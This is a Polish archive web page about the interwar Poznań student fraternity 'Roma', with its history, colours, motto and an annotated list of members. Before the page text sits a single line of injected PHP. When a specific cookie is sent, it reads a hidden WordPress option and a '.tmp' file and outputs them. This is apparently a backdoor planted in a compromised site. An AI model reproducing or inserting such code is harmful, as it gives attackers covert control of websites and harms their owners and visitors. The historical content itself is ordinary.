if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Roma

Dekiel NN Nazwa:
Akademicka Korporacja „Roma” przy Uniwersytecie Poznańskim
Siedziba:
Poznań
Data powstania:
24 II 1927 r.
Barwy:
biała – żółta – czerwona
Dewiza:
„Omnia instaurare in Christo” (”Wszystko odnowić w Chrystusie”)

Rys historyczny

Szarfa prezydialna Romy, lata 30-te.

Roma powstała dnia 24 II 1927 r. w Poznaniu. Zrzeszała studentów Uniwersytetu Poznańskiego. Kuratorem z ramienia uniwersyteckiego Senatu był prof. Adam Wrzosek.

Pod względem ideowym Roma należała do korporacji chrześcijańskich i przez pewien czas była członkiem Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich.

Roma, Poznań 23 II 1928 r.

Całkowita ustalona, choć niekompletna imienna lista członków Romy obejmuje 43 nazwiska, w tym trzech członków honorowych.

Po wojnie odbywały się spotkania niewielkiej grupy członków korporacji.

W 2009 r. pod opieką K! Masovia Roma została reaktywowana.

Wieczór taneczny Romy, Poznań ok. 1932 r.

Lista członków

Poniższa, niekompletna lista członków Romy obejmuje 43 nazwiska. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Feliks Górnicki, (14 czerwca 1894 w Wiesbaden - 1940 w Katyniu), s. Władysława i Barbary z Einmahlów, absolwent Gimnazjum w Wiesbaden, uczestnik I wojny światowej, organizator i kierownik Szkoły Lotników Obserwatorów w Ławicy, w 1920 w 14 Pułku Artylerii Ciężkiej, student i absolwent prawa UP, dr prawa UP 1925, po studiach pracownik biura notarialnego Cichowicza, następnie wraz ze Stanisławem Karbońskim współwłaściciel kancelarii prawnej, przez ponad dwa lata jeden z dyrektorów Zakładu Ubezpieczeń „Vesta” w Poznaniu, Filister honorowy Romy, ppor. rez. 3 Pułku Lotniczego, uczestnik wojny obronnej 1939, wzięty do niewoli sowieckiej pod Trembowlą, więzień obozu w Kozielsku, zamordowany w Katyniu, odznaczony m.in. Krzyżem Żelaznym (za Verdun), w 2008 r. awansowany pośmiertnie na kapitana

  Aleksander Grandkowski, lata 30-te.

 2. Aleksander Grandkowski, (1881 - ) ojciec Zbigniewa (Lechia), przedsiębiorca, Filister honorowy Romy

 3. Adam Wrzosek, (?) (6 maja 1875 w Zagórzu - 26 lutego 1965 w Poznaniu) z rodziny szlacheckiej herbu Dołęga, studiował w Kijowie, Zurychu, Berlinie, Paryżu, Krakowie i Wiedniu, od 1910 prof. UJ, od 1920 prof. UP, organizator i pierwszy dziekan Wydziału Lekarskiego UP, kurator i Filister honorowy (?) Romy, kierownik Zakładu Historii Medycyny USB 1935-39, założyciel Polskiego Towarzystwa Antropologicznego i Towarzystwa Historii Medycyny, po 1945 prof. UP, autor ok. 450 prac naukowych, głównie z historii medycyny, antropologii, prehistorii, etnografii i kultury polskiej
  Członkowie rzeczywiści
 1. Edward Baranowski, (1908-1992)

  Jerzy Barganowski, 1931 r.

 2. Jerzy Barganowski, (3 kwietnia 1913 w Malborku - 18 lutego 1984 w Tczewie) s. Józefa i Marii z d. Szczepińskiej, kuzyn Franciszka (Pomerania), student prawa UP, wiceprezes sem. zim. 1933/34, po wojnie adwokat w Tczewie, pochowany na starym Cmentarzu przy u. 30 Stycznia w Tczewie

 3. M. Bednarkiewicz, prezes sem. zim. 1932/33
 4. Franciszek Bianek, (1905-1981)
 5. Leon Całka, (1910-1944) założyciel Romy
 6. Klemens Długaj, sekretarz sem. let. 1935/36, wiceprezes sem. let. 1936/37

  Adam Fabianowski, 1926 r.

 7. Adam Fabianowski, (1909-1983 w Inowrocławiu) brat Floriana (Roma), po wojnie proboszcz Parafii św. Józefa w Inowrocławiu

  Florian Fabianowski, 1928 r.

 8. Florian Adolf Fabianowski, (17 kwietnia 1906 w Dobiszewie -1992) brat Adama (Roma), student i absolwent 1933 UP, dr med., po wojnie lekarz w Lutomiersku k. Łodzi

 9. Józef Figna,
 10. Władysław (?) Gniazdowski,
 11. Czesław Gogołkiewicz, (3 kwietnia 1907 w Mijanowie - 28 stycznia 1973 w Janikowie) s. Marcina (rolnika - gospodarza) i Heleny z d. Behnke, uczeń Gimnazjum Realnego w Gniewie, matura w Gimnazjum Humanistycznym w Tczewie 1926, student i absolwent Wydziału Lekarskiego UP 1926-31, dr med. 1932, ukończył Szkołę Podchorążych Rezerwy w Wawrze 1932-33, pracował w Ubezpieczalni Społecznej w Inowrocławiu 1933-37, a następnie jako lekarz powiatowy w Toruniu 1938, we wrześniu 1939 brał udział w organizacji szpitala w Kocku, więzień obozów koncentracyjnych w Dachau, Guzen i Mauthausen 5 V 1940 - 31 XI 1940 oraz sowieckiego łagru pod Charkowem 21 I 1945 - 31 VII 1945, po powrocie do kraju dyrektor szpitala w Sztumie 1946-50, przychodni zdrowia i rejonowej przychodni lekarskiej PKP w Malborku 1950-52, dyrektor Szpitala Przeciwgruźliczego w Kołudzie Małej k. Inowrocławia 1967-72, pochowany na cmentarzu w Kałdowie k. Malborka [Źródła (poza wskazanymi poniżej spisu członków): relacja syna Jerzego Gogołkiewicza]
 12. Jan Antoni Hejko-Porębski, (27 grudnia 1912 w Lubawie - ) student i absolwent 1936 med. UP, sekretarz sem. zim. 1932/33, prezes sem. zim. 1933/34, wenerolog, w 1956 lekarz w Toruniu
 13. Alfons Hutek, c. 1936
 14. Marian Janicki, skarbnik sem. zim. 1933/34
 15. Czesław Kiełczewski, (1912 - 7 lipca 1942), absolwent Gimnazjum im. Adama Mickiewicza w Poznaniu, członek 16. Drużyny Harcerskiej im. gen. Józefa Bema w Poznaniu, mgr prawa UP 1932, sekretarz sem. zim. 1933/34, prezes sem. let. 1935/36 oraz sem. let. 1936/37, w konspiracji w “Ojczyźnie”, wydawca pisma „Polska”, od 1940 pracownik Biura Delegatury Rządu w Poznaniu, aresztowany w początkach 1942 i osadzony w Forcie VII, zamordowany, najprawdopodobniej przez rozstrzelanie
 16. Eugeniusz Koszański, (?), dr med., chirurg, pracownik Kliniki Chirurgii AM w Łodzi
 17. Stefan Kucharski, sekretarz sem. let. 1938/39
 18. Alfred Lehman,
 19. Lech Lehman,
 20. Leśniak, (?), [prawd. Marian Władysław Leśniak (6 września 1906 w Dąbrowie Górniczej - ) student i absolwent 1934 med. UP, dr med. UP 1945, chirurg, w 1956 lekarz w Łodzi]
 21. Zefiryn Ligocki, skarbnik sem. let. 1935/36 oraz sem. let. 1936/37
 22. Paweł Lubecki, sekretarz sem. zim. 1937/38 oraz sem. zim. 1938/39

  Witold Lubierski, ok. 1931 r.

 23. Witold Lubierski, z Leszna (?), student Wydziału Prawno-Ekonomicznego UP, akt. 1932, wystąpił 1932, w 1939 pracownik Fabryki Opon i Dętek Samochodowych “Stomil”

 24. Tadeusz Malinowski, wiceprezes sem. let. 1935/36
 25. Eustachy Mikołajewski, sekretarz sem. let. 1935/36 (po Klemensie Długaju)
 26. Bronisław Mikuła,
 27. Marian Musiał, skarbnik sem. zim. 1937/38 oraz sem. zim. 1938/39
 28. Stefan Niedzielski, prezes sem. zim. 1937/38 oraz sem. zim. 1938/39
 29. Teodor Niziołkiewicz, skarbnik sem. let. 1938/39
 30. Edmund Nowacki, sekretarz sem. let. 1936/37
 31. Antoni Paul, (9 października 1906 w miejsc. Huadec w Czechach - 9 maja 1974) student i absolwent 1933 med. UP, laryngolog, w 1939 kierownik Wydziału Zdrowia w Kaliszu

  Karol Marian Pospieszalski, ok. 1932 r.

 32. Karol Marian Pospieszalski, (11 września 1909 w Bremie - 19 lutego 2007 w Poznaniu) s. Mariana i Heleny z d. Meiners, absolwent Państwowego Gimnazjum Męskiego Humanistycznego im. Ignacego Jana Paderewskiego w Poznaniu 1927, student prawa UP, po studiach sędzia w Sądzie Grodzkim w Tczewie, w 1939 wysiedlony do tzw. Generalnej Guberni, od listopada 1939 w konspiracji w organizacji „Ojczyzna”, współzałożyciel Instytutu Zachodniego 1945, od 1945 pracownik Instytutu Zachodniego oraz Wydziału Prawno-Ekonomicznego UP, dr prawa UP 1945, konstytucjonalista i badacz dziejów okupacji, habilitacja 1948, biegły w procesach zbrodniarzy hitlerowskich, m.in. Namiestnika Kraju Warty Arthura Greisera, Wyższego Dowódcy SS i Policji w Okręgu Rzeszy Gdańsk-Prusy Zachodnie Richarda Hildebrandta, Nadprezydenta Prus Wschodnich Ericha Kocha, od lat 40-tych inwigilowany przez Urząd Bezpieczeństwa, a następnie przez Służbę Bezpieczeństwa, od 1956 docent UP, od 1957 prof. nadzw. i kierownik Katedry Prawa Państwowego UP, w 1966 zwolniony z Instytutu Zachodniego w związku z odmową podpisania uchwały pracowników Instytutu potępiającej polski Episkopat za skierowanie orędzia do biskupów niemieckich „Przebaczamy i prosimy o przebaczenie”, w 1974 usunięty ze stanowiska szefa Zakładu Prawa Państwowego, od 1979 na emeryturze, autor ok. 150 prac naukowych, m.in. serii wydawniczej Documenta Occupationis, członek Poznańskiego Towarzystwa Przyjaciół Nauk, Głównej Komisji Badań Zbrodni Hitlerowskich IPN, od 1970 członek honorowy Instytutu Zachodniego, Honorowy Obywatel Miasta Poznania 2005, odznaczony m.in. Złotym Krzyżem Zasługi, Krzyżem Kawalerskim i Oficerskim OOP

 33. Mieczysław Rachwał, prawnik, adwokat
 34. (Nikodem) Józef Rzemieczniewski (Rzemieniewski), wiceprezes sem. let. 1938/39
 35. Walerian Sobkowiak, polonista
 36. Witold Spychalski,

  Nikodem Śniadecki, lata 20-te.

 37. Nikodem Śniadecki, (11 listopada 1902 - 14 maja 1930) student i absolwent prawa UP, współzałożyciel i prezes Romy, wiceprezes Koła Filistrów Romy, pochowany na cmentarzu na Dębcu w Poznaniu

  Alfred Taczak, ok. 1930 r.

 38. Alfred Taczak, (3 lipca 1903 w Lenartowicach pow. Pleszew - 19 listopada 1975) brat Zygmunta (Roma), absolwent Gimnazjum w Bydgoszczy 1922, student prawa UP 1922-28, od 1931 sędzia w Bydgoszczy, m.in. kierownik Sądu Grodzkiego, w czasie okupacji pracownik biurowy “Domu Handlowego Jan Chodorowski i Ska” w Warszawie, uczestnik powstania warszawskiego, aresztowany i osadzony w obozie koncentracyjnym we Flossenburgu, od 1945 kierownik Sądu Grodzkiego w Bydgoszczy, przewodniczący Wydziału Cywilnego Sądu Okręgowego w Bydgoszczy, od 1970 na emeryturze pracował jako radca prawny, działacz Zrzeszenia Prawników Polskich

  Zygmunt Taczak, ok. 1930 r.

 39. Zygmunt Taczak, (18 lutego 1907 w Kotlinie - 6 stycznia 1982 w Gnieźnie) s. Michała (nauczyciela), bratanek gen. Stanisława Taczaka (Lechia), brat Alfreda (Roma), kuzyn Czesława Gogołkiewicza (Roma), student i absolwent 1933 med. UP, doktor med. 1935, odbył staże kliniczne w szpitalach poznańskich, później lekarz Ubezpieczalni Społecznej w Zaniemyślu 1934-38 i Poznaniu 1938-45, lekarz powiatowy, a następnie kierownik Wydziału Zdrowia Powiatowej Rady Narodowej w Gnieźnie 1945-55, od lutego 1947 do sierpnia 1948 w stopniu podporucznika, lekarz rejonowy Ubezpieczalni Społecznej 1948-51, od 1952 lekarz w przychodni PKP i jednocześnie aż do lat 70. jako reumatolog w Powiatowej Poradni Reumatologicznej w Gnieźnie

 40. Leszek Winiecki, wiceprezes sem. zim. 1937/38 oraz sem. zim. 1938/39, prezes sem. let. 1938/39

Pieczęć Romy, 1932 r.

Listę członków opracowano na podstawie:

1) Zbysław Popławski, Akademicka Korporacja Roma przy Uniwersytecie Poznański, maszynopis,
2) materiałów archiwalnych z Archiwum Korporacyjnego,
3) danych encyklopedycznych i słownikowych oraz rozmów z rodzinami zmarłych członków Romy.

Zaproszenie na Reprezentacyjny Wieczór Karnawałowy Romy 23 lutego 1935 r.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 12 VII 2008 r.
Ostatnia zmiana: 1 IV 2020 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Akademicka Korporacja „Roma” przy Uniwersytecie Poznańskim, (na:) www.archiwumkorporacyjne.pl, stan 1 IV 2020 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }